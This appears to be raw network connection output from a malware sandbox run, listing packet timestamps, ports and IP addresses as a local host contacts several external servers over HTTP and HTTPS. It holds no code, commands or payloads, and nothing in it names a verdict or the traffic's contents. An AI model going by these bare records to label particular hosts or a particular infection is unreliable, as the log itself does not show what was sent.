Nov 5, 2024 11:05:05.868846893 CET	443	49755	188.132.193.46	192.168.2.7
Nov 5, 2024 11:05:05.868916035 CET	49755	443	192.168.2.7	188.132.193.46
Nov 5, 2024 11:05:05.868927956 CET	443	49755	188.132.193.46	192.168.2.7
Nov 5, 2024 11:05:05.868964911 CET	49755	443	192.168.2.7	188.132.193.46
Nov 5, 2024 11:05:05.868999958 CET	49755	443	192.168.2.7	188.132.193.46
Nov 5, 2024 11:05:05.994369030 CET	443	49755	188.132.193.46	192.168.2.7
Nov 5, 2024 11:05:05.994395971 CET	443	49755	188.132.193.46	192.168.2.7
Nov 5, 2024 11:05:05.994471073 CET	49755	443	192.168.2.7	188.132.193.46
Nov 5, 2024 11:05:05.994481087 CET	443	49755	188.132.193.46	192.168.2.7
Nov 5, 2024 11:05:05.994625092 CET	49755	443	192.168.2.7	188.132.193.46
Nov 5, 2024 11:05:05.999186993 CET	443	49755	188.132.193.46	192.168.2.7
Nov 5, 2024 11:05:05.999207973 CET	443	49755	188.132.193.46	192.168.2.7
Nov 5, 2024 11:05:05.999303102 CET	49755	443	192.168.2.7	188.132.193.46
Nov 5, 2024 11:05:05.999308109 CET	443	49755	188.132.193.46	192.168.2.7
Nov 5, 2024 11:05:05.999392033 CET	49755	443	192.168.2.7	188.132.193.46
Nov 5, 2024 11:05:06.104552984 CET	443	49755	188.132.193.46	192.168.2.7
Nov 5, 2024 11:05:06.104582071 CET	443	49755	188.132.193.46	192.168.2.7
Nov 5, 2024 11:05:06.104756117 CET	49755	443	192.168.2.7	188.132.193.46
Nov 5, 2024 11:05:06.104775906 CET	443	49755	188.132.193.46	192.168.2.7
Nov 5, 2024 11:05:06.109471083 CET	49755	443	192.168.2.7	188.132.193.46
Nov 5, 2024 11:05:06.176254988 CET	443	49755	188.132.193.46	192.168.2.7
Nov 5, 2024 11:05:06.176287889 CET	443	49755	188.132.193.46	192.168.2.7
Nov 5, 2024 11:05:06.176412106 CET	49755	443	192.168.2.7	188.132.193.46
Nov 5, 2024 11:05:06.176429987 CET	443	49755	188.132.193.46	192.168.2.7
Nov 5, 2024 11:05:06.179301023 CET	49755	443	192.168.2.7	188.132.193.46
Nov 5, 2024 11:05:06.228388071 CET	443	49755	188.132.193.46	192.168.2.7
Nov 5, 2024 11:05:06.228414059 CET	443	49755	188.132.193.46	192.168.2.7
Nov 5, 2024 11:05:06.228676081 CET	49755	443	192.168.2.7	188.132.193.46
Nov 5, 2024 11:05:06.228693962 CET	443	49755	188.132.193.46	192.168.2.7
Nov 5, 2024 11:05:06.231282949 CET	49755	443	192.168.2.7	188.132.193.46
Nov 5, 2024 11:05:06.337305069 CET	443	49755	188.132.193.46	192.168.2.7
Nov 5, 2024 11:05:06.337338924 CET	443	49755	188.132.193.46	192.168.2.7
Nov 5, 2024 11:05:06.337451935 CET	49755	443	192.168.2.7	188.132.193.46
Nov 5, 2024 11:05:06.337472916 CET	443	49755	188.132.193.46	192.168.2.7
Nov 5, 2024 11:05:06.339288950 CET	49755	443	192.168.2.7	188.132.193.46
Nov 5, 2024 11:05:06.346309900 CET	443	49755	188.132.193.46	192.168.2.7
Nov 5, 2024 11:05:06.346339941 CET	443	49755	188.132.193.46	192.168.2.7
Nov 5, 2024 11:05:06.346416950 CET	49755	443	192.168.2.7	188.132.193.46
Nov 5, 2024 11:05:06.346432924 CET	443	49755	188.132.193.46	192.168.2.7
Nov 5, 2024 11:05:06.346502066 CET	49755	443	192.168.2.7	188.132.193.46
Nov 5, 2024 11:05:06.454905987 CET	443	49755	188.132.193.46	192.168.2.7
Nov 5, 2024 11:05:06.454931021 CET	443	49755	188.132.193.46	192.168.2.7
Nov 5, 2024 11:05:06.454987049 CET	49755	443	192.168.2.7	188.132.193.46
Nov 5, 2024 11:05:06.455008030 CET	443	49755	188.132.193.46	192.168.2.7
Nov 5, 2024 11:05:06.455061913 CET	49755	443	192.168.2.7	188.132.193.46
Nov 5, 2024 11:05:06.464236021 CET	443	49755	188.132.193.46	192.168.2.7
Nov 5, 2024 11:05:06.464263916 CET	443	49755	188.132.193.46	192.168.2.7
Nov 5, 2024 11:05:06.464312077 CET	49755	443	192.168.2.7	188.132.193.46
Nov 5, 2024 11:05:06.464323044 CET	443	49755	188.132.193.46	192.168.2.7
Nov 5, 2024 11:05:06.464365005 CET	49755	443	192.168.2.7	188.132.193.46
Nov 5, 2024 11:05:06.464365005 CET	49755	443	192.168.2.7	188.132.193.46
Nov 5, 2024 11:05:06.571698904 CET	443	49755	188.132.193.46	192.168.2.7
Nov 5, 2024 11:05:06.571727991 CET	443	49755	188.132.193.46	192.168.2.7
Nov 5, 2024 11:05:06.571784973 CET	49755	443	192.168.2.7	188.132.193.46
Nov 5, 2024 11:05:06.571820974 CET	443	49755	188.132.193.46	192.168.2.7
Nov 5, 2024 11:05:06.571966887 CET	49755	443	192.168.2.7	188.132.193.46
Nov 5, 2024 11:05:06.571966887 CET	49755	443	192.168.2.7	188.132.193.46
Nov 5, 2024 11:05:06.581649065 CET	443	49755	188.132.193.46	192.168.2.7
Nov 5, 2024 11:05:06.581685066 CET	443	49755	188.132.193.46	192.168.2.7
Nov 5, 2024 11:05:06.581789970 CET	49755	443	192.168.2.7	188.132.193.46
Nov 5, 2024 11:05:06.581789970 CET	49755	443	192.168.2.7	188.132.193.46
Nov 5, 2024 11:05:06.581804991 CET	443	49755	188.132.193.46	192.168.2.7
Nov 5, 2024 11:05:06.581989050 CET	49755	443	192.168.2.7	188.132.193.46
Nov 5, 2024 11:05:06.688678980 CET	443	49755	188.132.193.46	192.168.2.7
Nov 5, 2024 11:05:06.688704014 CET	443	49755	188.132.193.46	192.168.2.7
Nov 5, 2024 11:05:06.689131021 CET	49755	443	192.168.2.7	188.132.193.46
Nov 5, 2024 11:05:06.689146996 CET	443	49755	188.132.193.46	192.168.2.7
Nov 5, 2024 11:05:06.689590931 CET	49755	443	192.168.2.7	188.132.193.46
Nov 5, 2024 11:05:06.698710918 CET	443	49755	188.132.193.46	192.168.2.7
Nov 5, 2024 11:05:06.698734999 CET	443	49755	188.132.193.46	192.168.2.7
Nov 5, 2024 11:05:06.699336052 CET	49755	443	192.168.2.7	188.132.193.46
Nov 5, 2024 11:05:06.699350119 CET	443	49755	188.132.193.46	192.168.2.7
Nov 5, 2024 11:05:06.699521065 CET	49755	443	192.168.2.7	188.132.193.46
Nov 5, 2024 11:05:06.805303097 CET	443	49755	188.132.193.46	192.168.2.7
Nov 5, 2024 11:05:06.805330992 CET	443	49755	188.132.193.46	192.168.2.7
Nov 5, 2024 11:05:06.805408955 CET	49755	443	192.168.2.7	188.132.193.46
Nov 5, 2024 11:05:06.805428982 CET	443	49755	188.132.193.46	192.168.2.7
Nov 5, 2024 11:05:06.805483103 CET	49755	443	192.168.2.7	188.132.193.46
Nov 5, 2024 11:05:06.815684080 CET	443	49755	188.132.193.46	192.168.2.7
Nov 5, 2024 11:05:06.815701962 CET	443	49755	188.132.193.46	192.168.2.7
Nov 5, 2024 11:05:06.815768957 CET	49755	443	192.168.2.7	188.132.193.46
Nov 5, 2024 11:05:06.815776110 CET	443	49755	188.132.193.46	192.168.2.7
Nov 5, 2024 11:05:06.815799952 CET	49755	443	192.168.2.7	188.132.193.46
Nov 5, 2024 11:05:06.815856934 CET	49755	443	192.168.2.7	188.132.193.46
Nov 5, 2024 11:05:06.921858072 CET	443	49755	188.132.193.46	192.168.2.7
Nov 5, 2024 11:05:06.921885967 CET	443	49755	188.132.193.46	192.168.2.7
Nov 5, 2024 11:05:06.921948910 CET	49755	443	192.168.2.7	188.132.193.46
Nov 5, 2024 11:05:06.921961069 CET	443	49755	188.132.193.46	192.168.2.7
Nov 5, 2024 11:05:06.922015905 CET	49755	443	192.168.2.7	188.132.193.46
Nov 5, 2024 11:05:06.922017097 CET	49755	443	192.168.2.7	188.132.193.46
Nov 5, 2024 11:05:06.930895090 CET	443	49755	188.132.193.46	192.168.2.7
Nov 5, 2024 11:05:06.930918932 CET	443	49755	188.132.193.46	192.168.2.7
Nov 5, 2024 11:05:06.931005955 CET	49755	443	192.168.2.7	188.132.193.46
Nov 5, 2024 11:05:06.931014061 CET	443	49755	188.132.193.46	192.168.2.7
Nov 5, 2024 11:05:06.931057930 CET	49755	443	192.168.2.7	188.132.193.46
Nov 5, 2024 11:05:06.994988918 CET	443	49755	188.132.193.46	192.168.2.7
Nov 5, 2024 11:05:06.995012999 CET	443	49755	188.132.193.46	192.168.2.7
Nov 5, 2024 11:05:06.995079041 CET	49755	443	192.168.2.7	188.132.193.46
Nov 5, 2024 11:05:06.995093107 CET	443	49755	188.132.193.46	192.168.2.7
Nov 5, 2024 11:05:06.995148897 CET	49755	443	192.168.2.7	188.132.193.46
Nov 5, 2024 11:05:06.995359898 CET	49755	443	192.168.2.7	188.132.193.46
Nov 5, 2024 11:05:07.046992064 CET	443	49755	188.132.193.46	192.168.2.7
Nov 5, 2024 11:05:07.047015905 CET	443	49755	188.132.193.46	192.168.2.7
Nov 5, 2024 11:05:07.047085047 CET	49755	443	192.168.2.7	188.132.193.46
Nov 5, 2024 11:05:07.047106981 CET	443	49755	188.132.193.46	192.168.2.7
Nov 5, 2024 11:05:07.047133923 CET	49755	443	192.168.2.7	188.132.193.46
Nov 5, 2024 11:05:07.047267914 CET	49755	443	192.168.2.7	188.132.193.46
Nov 5, 2024 11:05:07.050767899 CET	443	49755	188.132.193.46	192.168.2.7
Nov 5, 2024 11:05:07.050791025 CET	443	49755	188.132.193.46	192.168.2.7
Nov 5, 2024 11:05:07.050851107 CET	49755	443	192.168.2.7	188.132.193.46
Nov 5, 2024 11:05:07.050851107 CET	49755	443	192.168.2.7	188.132.193.46
Nov 5, 2024 11:05:07.050863981 CET	443	49755	188.132.193.46	192.168.2.7
Nov 5, 2024 11:05:07.051058054 CET	49755	443	192.168.2.7	188.132.193.46
Nov 5, 2024 11:05:07.156721115 CET	443	49755	188.132.193.46	192.168.2.7
Nov 5, 2024 11:05:07.156748056 CET	443	49755	188.132.193.46	192.168.2.7
Nov 5, 2024 11:05:07.156795979 CET	49755	443	192.168.2.7	188.132.193.46
Nov 5, 2024 11:05:07.156809092 CET	443	49755	188.132.193.46	192.168.2.7
Nov 5, 2024 11:05:07.156864882 CET	49755	443	192.168.2.7	188.132.193.46
Nov 5, 2024 11:05:07.166389942 CET	443	49755	188.132.193.46	192.168.2.7
Nov 5, 2024 11:05:07.166433096 CET	443	49755	188.132.193.46	192.168.2.7
Nov 5, 2024 11:05:07.166521072 CET	49755	443	192.168.2.7	188.132.193.46
Nov 5, 2024 11:05:07.166521072 CET	49755	443	192.168.2.7	188.132.193.46
Nov 5, 2024 11:05:07.166534901 CET	443	49755	188.132.193.46	192.168.2.7
Nov 5, 2024 11:05:07.166593075 CET	49755	443	192.168.2.7	188.132.193.46
Nov 5, 2024 11:05:07.228801966 CET	443	49755	188.132.193.46	192.168.2.7
Nov 5, 2024 11:05:07.228831053 CET	443	49755	188.132.193.46	192.168.2.7
Nov 5, 2024 11:05:07.228915930 CET	49755	443	192.168.2.7	188.132.193.46
Nov 5, 2024 11:05:07.228934050 CET	443	49755	188.132.193.46	192.168.2.7
Nov 5, 2024 11:05:07.229249954 CET	49755	443	192.168.2.7	188.132.193.46
Nov 5, 2024 11:05:07.229249954 CET	49755	443	192.168.2.7	188.132.193.46
Nov 5, 2024 11:05:07.281120062 CET	443	49755	188.132.193.46	192.168.2.7
Nov 5, 2024 11:05:07.281147003 CET	443	49755	188.132.193.46	192.168.2.7
Nov 5, 2024 11:05:07.281217098 CET	49755	443	192.168.2.7	188.132.193.46
Nov 5, 2024 11:05:07.281234026 CET	443	49755	188.132.193.46	192.168.2.7
Nov 5, 2024 11:05:07.281658888 CET	49755	443	192.168.2.7	188.132.193.46
Nov 5, 2024 11:05:07.284399033 CET	443	49755	188.132.193.46	192.168.2.7
Nov 5, 2024 11:05:07.284415007 CET	443	49755	188.132.193.46	192.168.2.7
Nov 5, 2024 11:05:07.285136938 CET	49755	443	192.168.2.7	188.132.193.46
Nov 5, 2024 11:05:07.285145998 CET	443	49755	188.132.193.46	192.168.2.7
Nov 5, 2024 11:05:07.285953999 CET	49755	443	192.168.2.7	188.132.193.46
Nov 5, 2024 11:05:07.389434099 CET	443	49755	188.132.193.46	192.168.2.7
Nov 5, 2024 11:05:07.389458895 CET	443	49755	188.132.193.46	192.168.2.7
Nov 5, 2024 11:05:07.389590025 CET	49755	443	192.168.2.7	188.132.193.46
Nov 5, 2024 11:05:07.389590025 CET	49755	443	192.168.2.7	188.132.193.46
Nov 5, 2024 11:05:07.389605045 CET	443	49755	188.132.193.46	192.168.2.7
Nov 5, 2024 11:05:07.389646053 CET	49755	443	192.168.2.7	188.132.193.46
Nov 5, 2024 11:05:07.399046898 CET	443	49755	188.132.193.46	192.168.2.7
Nov 5, 2024 11:05:07.399072886 CET	443	49755	188.132.193.46	192.168.2.7
Nov 5, 2024 11:05:07.399111986 CET	49755	443	192.168.2.7	188.132.193.46
Nov 5, 2024 11:05:07.399117947 CET	443	49755	188.132.193.46	192.168.2.7
Nov 5, 2024 11:05:07.399214983 CET	49755	443	192.168.2.7	188.132.193.46
Nov 5, 2024 11:05:07.402112007 CET	443	49755	188.132.193.46	192.168.2.7
Nov 5, 2024 11:05:07.402134895 CET	443	49755	188.132.193.46	192.168.2.7
Nov 5, 2024 11:05:07.402225971 CET	49755	443	192.168.2.7	188.132.193.46
Nov 5, 2024 11:05:07.402225971 CET	49755	443	192.168.2.7	188.132.193.46
Nov 5, 2024 11:05:07.402231932 CET	443	49755	188.132.193.46	192.168.2.7
Nov 5, 2024 11:05:07.403008938 CET	49755	443	192.168.2.7	188.132.193.46
Nov 5, 2024 11:05:07.507308960 CET	443	49755	188.132.193.46	192.168.2.7
Nov 5, 2024 11:05:07.507349968 CET	443	49755	188.132.193.46	192.168.2.7
Nov 5, 2024 11:05:07.507602930 CET	49755	443	192.168.2.7	188.132.193.46
Nov 5, 2024 11:05:07.507615089 CET	443	49755	188.132.193.46	192.168.2.7
Nov 5, 2024 11:05:07.508635998 CET	49755	443	192.168.2.7	188.132.193.46
Nov 5, 2024 11:05:07.516074896 CET	443	49755	188.132.193.46	192.168.2.7
Nov 5, 2024 11:05:07.516103029 CET	443	49755	188.132.193.46	192.168.2.7
Nov 5, 2024 11:05:07.516172886 CET	49755	443	192.168.2.7	188.132.193.46
Nov 5, 2024 11:05:07.516181946 CET	443	49755	188.132.193.46	192.168.2.7
Nov 5, 2024 11:05:07.516221046 CET	49755	443	192.168.2.7	188.132.193.46
Nov 5, 2024 11:05:07.516221046 CET	49755	443	192.168.2.7	188.132.193.46
Nov 5, 2024 11:05:07.554449081 CET	443	49755	188.132.193.46	192.168.2.7
Nov 5, 2024 11:05:07.554478884 CET	443	49755	188.132.193.46	192.168.2.7
Nov 5, 2024 11:05:07.554534912 CET	49755	443	192.168.2.7	188.132.193.46
Nov 5, 2024 11:05:07.554542065 CET	443	49755	188.132.193.46	192.168.2.7
Nov 5, 2024 11:05:07.554608107 CET	49755	443	192.168.2.7	188.132.193.46
Nov 5, 2024 11:05:07.624522924 CET	443	49755	188.132.193.46	192.168.2.7
Nov 5, 2024 11:05:07.624546051 CET	443	49755	188.132.193.46	192.168.2.7
Nov 5, 2024 11:05:07.624589920 CET	49755	443	192.168.2.7	188.132.193.46
Nov 5, 2024 11:05:07.624603987 CET	443	49755	188.132.193.46	192.168.2.7
Nov 5, 2024 11:05:07.624650002 CET	49755	443	192.168.2.7	188.132.193.46
Nov 5, 2024 11:05:07.624650002 CET	49755	443	192.168.2.7	188.132.193.46
Nov 5, 2024 11:05:07.633004904 CET	443	49755	188.132.193.46	192.168.2.7
Nov 5, 2024 11:05:07.633025885 CET	443	49755	188.132.193.46	192.168.2.7
Nov 5, 2024 11:05:07.633120060 CET	49755	443	192.168.2.7	188.132.193.46
Nov 5, 2024 11:05:07.633130074 CET	443	49755	188.132.193.46	192.168.2.7
Nov 5, 2024 11:05:07.633172989 CET	49755	443	192.168.2.7	188.132.193.46
Nov 5, 2024 11:05:07.670936108 CET	443	49755	188.132.193.46	192.168.2.7
Nov 5, 2024 11:05:07.670964003 CET	443	49755	188.132.193.46	192.168.2.7
Nov 5, 2024 11:05:07.671039104 CET	49755	443	192.168.2.7	188.132.193.46
Nov 5, 2024 11:05:07.671051979 CET	443	49755	188.132.193.46	192.168.2.7
Nov 5, 2024 11:05:07.671067953 CET	49755	443	192.168.2.7	188.132.193.46
Nov 5, 2024 11:05:07.671143055 CET	49755	443	192.168.2.7	188.132.193.46
Nov 5, 2024 11:05:07.741416931 CET	443	49755	188.132.193.46	192.168.2.7
Nov 5, 2024 11:05:07.741444111 CET	443	49755	188.132.193.46	192.168.2.7
Nov 5, 2024 11:05:07.741527081 CET	49755	443	192.168.2.7	188.132.193.46
Nov 5, 2024 11:05:07.741540909 CET	443	49755	188.132.193.46	192.168.2.7
Nov 5, 2024 11:05:07.741588116 CET	49755	443	192.168.2.7	188.132.193.46
Nov 5, 2024 11:05:07.741588116 CET	49755	443	192.168.2.7	188.132.193.46
Nov 5, 2024 11:05:07.749960899 CET	443	49755	188.132.193.46	192.168.2.7
Nov 5, 2024 11:05:07.749984980 CET	443	49755	188.132.193.46	192.168.2.7
Nov 5, 2024 11:05:07.750041008 CET	49755	443	192.168.2.7	188.132.193.46
Nov 5, 2024 11:05:07.750058889 CET	443	49755	188.132.193.46	192.168.2.7
Nov 5, 2024 11:05:07.750072956 CET	49755	443	192.168.2.7	188.132.193.46
Nov 5, 2024 11:05:07.750225067 CET	49755	443	192.168.2.7	188.132.193.46
Nov 5, 2024 11:05:07.752249002 CET	443	49755	188.132.193.46	192.168.2.7
Nov 5, 2024 11:05:07.752266884 CET	443	49755	188.132.193.46	192.168.2.7
Nov 5, 2024 11:05:07.752338886 CET	49755	443	192.168.2.7	188.132.193.46
Nov 5, 2024 11:05:07.752346992 CET	443	49755	188.132.193.46	192.168.2.7
Nov 5, 2024 11:05:07.752409935 CET	49755	443	192.168.2.7	188.132.193.46
Nov 5, 2024 11:05:07.857800007 CET	443	49755	188.132.193.46	192.168.2.7
Nov 5, 2024 11:05:07.857827902 CET	443	49755	188.132.193.46	192.168.2.7
Nov 5, 2024 11:05:07.857909918 CET	49755	443	192.168.2.7	188.132.193.46
Nov 5, 2024 11:05:07.857924938 CET	443	49755	188.132.193.46	192.168.2.7
Nov 5, 2024 11:05:07.857980967 CET	49755	443	192.168.2.7	188.132.193.46
Nov 5, 2024 11:05:07.866405010 CET	443	49755	188.132.193.46	192.168.2.7
Nov 5, 2024 11:05:07.866427898 CET	443	49755	188.132.193.46	192.168.2.7
Nov 5, 2024 11:05:07.866486073 CET	49755	443	192.168.2.7	188.132.193.46
Nov 5, 2024 11:05:07.866507053 CET	443	49755	188.132.193.46	192.168.2.7
Nov 5, 2024 11:05:07.866637945 CET	49755	443	192.168.2.7	188.132.193.46
Nov 5, 2024 11:05:07.868838072 CET	443	49755	188.132.193.46	192.168.2.7
Nov 5, 2024 11:05:07.868855953 CET	443	49755	188.132.193.46	192.168.2.7
Nov 5, 2024 11:05:07.869066000 CET	49755	443	192.168.2.7	188.132.193.46
Nov 5, 2024 11:05:07.869079113 CET	443	49755	188.132.193.46	192.168.2.7
Nov 5, 2024 11:05:07.869155884 CET	49755	443	192.168.2.7	188.132.193.46
Nov 5, 2024 11:05:07.930635929 CET	443	49755	188.132.193.46	192.168.2.7
Nov 5, 2024 11:05:07.930672884 CET	443	49755	188.132.193.46	192.168.2.7
Nov 5, 2024 11:05:07.930756092 CET	49755	443	192.168.2.7	188.132.193.46
Nov 5, 2024 11:05:07.930772066 CET	443	49755	188.132.193.46	192.168.2.7
Nov 5, 2024 11:05:07.930869102 CET	49755	443	192.168.2.7	188.132.193.46
Nov 5, 2024 11:05:07.930869102 CET	49755	443	192.168.2.7	188.132.193.46
Nov 5, 2024 11:05:07.991153955 CET	443	49755	188.132.193.46	192.168.2.7
Nov 5, 2024 11:05:07.991179943 CET	443	49755	188.132.193.46	192.168.2.7
Nov 5, 2024 11:05:07.991271019 CET	49755	443	192.168.2.7	188.132.193.46
Nov 5, 2024 11:05:07.991286993 CET	443	49755	188.132.193.46	192.168.2.7
Nov 5, 2024 11:05:07.991343975 CET	49755	443	192.168.2.7	188.132.193.46
Nov 5, 2024 11:05:07.994117975 CET	443	49755	188.132.193.46	192.168.2.7
Nov 5, 2024 11:05:07.994136095 CET	443	49755	188.132.193.46	192.168.2.7
Nov 5, 2024 11:05:07.994245052 CET	49755	443	192.168.2.7	188.132.193.46
Nov 5, 2024 11:05:07.994252920 CET	443	49755	188.132.193.46	192.168.2.7
Nov 5, 2024 11:05:07.994685888 CET	49755	443	192.168.2.7	188.132.193.46
Nov 5, 2024 11:05:08.022588015 CET	443	49755	188.132.193.46	192.168.2.7
Nov 5, 2024 11:05:08.022609949 CET	443	49755	188.132.193.46	192.168.2.7
Nov 5, 2024 11:05:08.022710085 CET	443	49755	188.132.193.46	192.168.2.7
Nov 5, 2024 11:05:08.022710085 CET	49755	443	192.168.2.7	188.132.193.46
Nov 5, 2024 11:05:08.022721052 CET	443	49755	188.132.193.46	192.168.2.7
Nov 5, 2024 11:05:08.022779942 CET	443	49755	188.132.193.46	192.168.2.7
Nov 5, 2024 11:05:08.022780895 CET	49755	443	192.168.2.7	188.132.193.46
Nov 5, 2024 11:05:08.022886038 CET	49755	443	192.168.2.7	188.132.193.46
Nov 5, 2024 11:05:08.025660992 CET	49755	443	192.168.2.7	188.132.193.46
Nov 5, 2024 11:05:09.444042921 CET	49795	80	192.168.2.7	132.226.247.73
Nov 5, 2024 11:05:09.448904037 CET	80	49795	132.226.247.73	192.168.2.7
Nov 5, 2024 11:05:09.448977947 CET	49795	80	192.168.2.7	132.226.247.73
Nov 5, 2024 11:05:09.449215889 CET	49795	80	192.168.2.7	132.226.247.73
Nov 5, 2024 11:05:09.453983068 CET	80	49795	132.226.247.73	192.168.2.7
Nov 5, 2024 11:05:09.819113016 CET	80	49746	132.226.247.73	192.168.2.7
Nov 5, 2024 11:05:09.820554972 CET	49797	443	192.168.2.7	188.114.96.3
Nov 5, 2024 11:05:09.820606947 CET	443	49797	188.114.96.3	192.168.2.7
Nov 5, 2024 11:05:09.820677042 CET	49797	443	192.168.2.7	188.114.96.3
Nov 5, 2024 11:05:09.820983887 CET	49797	443	192.168.2.7	188.114.96.3
Nov 5, 2024 11:05:09.820993900 CET	443	49797	188.114.96.3	192.168.2.7
Nov 5, 2024 11:05:09.871997118 CET	49746	80	192.168.2.7	132.226.247.73
Nov 5, 2024 11:05:10.426242113 CET	443	49797	188.114.96.3	192.168.2.7
Nov 5, 2024 11:05:10.436439991 CET	49797	443	192.168.2.7	188.114.96.3
Nov 5, 2024 11:05:10.436472893 CET	443	49797	188.114.96.3	192.168.2.7
Nov 5, 2024 11:05:10.571341038 CET	443	49797	188.114.96.3	192.168.2.7
Nov 5, 2024 11:05:10.571441889 CET	443	49797	188.114.96.3	192.168.2.7
Nov 5, 2024 11:05:10.571624994 CET	49797	443	192.168.2.7	188.114.96.3
Nov 5, 2024 11:05:10.572613001 CET	49797	443	192.168.2.7	188.114.96.3
Nov 5, 2024 11:05:12.189755917 CET	80	49795	132.226.247.73	192.168.2.7
Nov 5, 2024 11:05:12.195750952 CET	49795	80	192.168.2.7	132.226.247.73
Nov 5, 2024 11:05:12.200530052 CET	80	49795	132.226.247.73	192.168.2.7
Nov 5, 2024 11:05:12.552293062 CET	80	49795	132.226.247.73	192.168.2.7
Nov 5, 2024 11:05:12.587250948 CET	49813	443	192.168.2.7	188.114.96.3
Nov 5, 2024 11:05:12.587306023 CET	443	49813	188.114.96.3	192.168.2.7
Nov 5, 2024 11:05:12.587384939 CET	49813	443	192.168.2.7	188.114.96.3
Nov 5, 2024 11:05:12.591578960 CET	49813	443	192.168.2.7	188.114.96.3
Nov 5, 2024 11:05:12.591588020 CET	443	49813	188.114.96.3	192.168.2.7
Nov 5, 2024 11:05:12.606399059 CET	49795	80	192.168.2.7	132.226.247.73
Nov 5, 2024 11:05:13.449491024 CET	443	49813	188.114.96.3	192.168.2.7
Nov 5, 2024 11:05:13.449623108 CET	49813	443	192.168.2.7	188.114.96.3
Nov 5, 2024 11:05:13.452660084 CET	49813	443	192.168.2.7	188.114.96.3
Nov 5, 2024 11:05:13.452676058 CET	443	49813	188.114.96.3	192.168.2.7
Nov 5, 2024 11:05:13.453002930 CET	443	49813	188.114.96.3	192.168.2.7
Nov 5, 2024 11:05:13.497025967 CET	49813	443	192.168.2.7	188.114.96.3
Nov 5, 2024 11:05:13.498296022 CET	49813	443	192.168.2.7	188.114.96.3
Nov 5, 2024 11:05:13.539335966 CET	443	49813	188.114.96.3	192.168.2.7
Nov 5, 2024 11:05:13.637408018 CET	443	49813	188.114.96.3	192.168.2.7
Nov 5, 2024 11:05:13.637512922 CET	443	49813	188.114.96.3	192.168.2.7
Nov 5, 2024 11:05:13.637569904 CET	49813	443	192.168.2.7	188.114.96.3
Nov 5, 2024 11:05:13.641123056 CET	49813	443	192.168.2.7	188.114.96.3
Nov 5, 2024 11:05:13.644951105 CET	49795	80	192.168.2.7	132.226.247.73
Nov 5, 2024 11:05:13.649965048 CET	80	49795	132.226.247.73	192.168.2.7
Nov 5, 2024 11:05:13.908240080 CET	80	49795	132.226.247.73	192.168.2.7
Nov 5, 2024 11:05:13.910511971 CET	49823	443	192.168.2.7	188.114.96.3
Nov 5, 2024 11:05:13.910553932 CET	443	49823	188.114.96.3	192.168.2.7
Nov 5, 2024 11:05:13.910629034 CET	49823	443	192.168.2.7	188.114.96.3
Nov 5, 2024 11:05:13.910897017 CET	49823	443	192.168.2.7	188.114.96.3
Nov 5, 2024 11:05:13.910909891 CET	443	49823	188.114.96.3	192.168.2.7
Nov 5, 2024 11:05:13.953308105 CET	49795	80	192.168.2.7	132.226.247.73
Nov 5, 2024 11:05:14.509469032 CET	443	49823	188.114.96.3	192.168.2.7
Nov 5, 2024 11:05:14.511200905 CET	49823	443	192.168.2.7	188.114.96.3
Nov 5, 2024 11:05:14.511234045 CET	443	49823	188.114.96.3	192.168.2.7
Nov 5, 2024 11:05:14.648415089 CET	443	49823	188.114.96.3	192.168.2.7
Nov 5, 2024 11:05:14.648549080 CET	443	49823	188.114.96.3	192.168.2.7
Nov 5, 2024 11:05:14.648598909 CET	49823	443	192.168.2.7	188.114.96.3
Nov 5, 2024 11:05:14.649080992 CET	49823	443	192.168.2.7	188.114.96.3
Nov 5, 2024 11:05:14.653865099 CET	49795	80	192.168.2.7	132.226.247.73
Nov 5, 2024 11:05:14.655297995 CET	49828	80	192.168.2.7	132.226.247.73
Nov 5, 2024 11:05:14.658967972 CET	80	49795	132.226.247.73	192.168.2.7
Nov 5, 2024 11:05:14.659024954 CET	49795	80	192.168.2.7	132.226.247.73
Nov 5, 2024 11:05:14.660687923 CET	80	49828	132.226.247.73	192.168.2.7
Nov 5, 2024 11:05:14.660787106 CET	49828	80	192.168.2.7	132.226.247.73
Nov 5, 2024 11:05:14.660926104 CET	49828	80	192.168.2.7	132.226.247.73
Nov 5, 2024 11:05:14.665713072 CET	80	49828	132.226.247.73	192.168.2.7
Nov 5, 2024 11:05:15.531630993 CET	80	49828	132.226.247.73	192.168.2.7
Nov 5, 2024 11:05:15.533818007 CET	49834	443	192.168.2.7	188.114.96.3
Nov 5, 2024 11:05:15.533879042 CET	443	49834	188.114.96.3	192.168.2.7
Nov 5, 2024 11:05:15.534018040 CET	49834	443	192.168.2.7	188.114.96.3
Nov 5, 2024 11:05:15.534272909 CET	49834	443	192.168.2.7	188.114.96.3
Nov 5, 2024 11:05:15.534286976 CET	443	49834	188.114.96.3	192.168.2.7
Nov 5, 2024 11:05:15.575161934 CET	49828	80	192.168.2.7	132.226.247.73
Nov 5, 2024 11:05:15.827331066 CET	49746	80	192.168.2.7	132.226.247.73
Nov 5, 2024 11:05:15.832861900 CET	80	49746	132.226.247.73	192.168.2.7
Nov 5, 2024 11:05:15.832947969 CET	49746	80	192.168.2.7	132.226.247.73
Nov 5, 2024 11:05:15.834851980 CET	49837	443	192.168.2.7	149.154.167.220
Nov 5, 2024 11:05:15.834944963 CET	443	49837	149.154.167.220	192.168.2.7
Nov 5, 2024 11:05:15.835079908 CET	49837	443	192.168.2.7	149.154.167.220
Nov 5, 2024 11:05:15.835485935 CET	49837	443	192.168.2.7	149.154.167.220
Nov 5, 2024 11:05:15.835513115 CET	443	49837	149.154.167.220	192.168.2.7
Nov 5, 2024 11:05:16.142321110 CET	443	49834	188.114.96.3	192.168.2.7
Nov 5, 2024 11:05:16.150984049 CET	49834	443	192.168.2.7	188.114.96.3
Nov 5, 2024 11:05:16.151010036 CET	443	49834	188.114.96.3	192.168.2.7
Nov 5, 2024 11:05:16.285821915 CET	443	49834	188.114.96.3	192.168.2.7
Nov 5, 2024 11:05:16.285934925 CET	443	49834	188.114.96.3	192.168.2.7
Nov 5, 2024 11:05:16.285990000 CET	49834	443	192.168.2.7	188.114.96.3
Nov 5, 2024 11:05:16.286533117 CET	49834	443	192.168.2.7	188.114.96.3
Nov 5, 2024 11:05:16.289803982 CET	49828	80	192.168.2.7	132.226.247.73
Nov 5, 2024 11:05:16.290955067 CET	49838	80	192.168.2.7	132.226.247.73
Nov 5, 2024 11:05:16.294912100 CET	80	49828	132.226.247.73	192.168.2.7
Nov 5, 2024 11:05:16.294965982 CET	49828	80	192.168.2.7	132.226.247.73
Nov 5, 2024 11:05:16.295738935 CET	80	49838	132.226.247.73	192.168.2.7
Nov 5, 2024 11:05:16.295821905 CET	49838	80	192.168.2.7	132.226.247.73
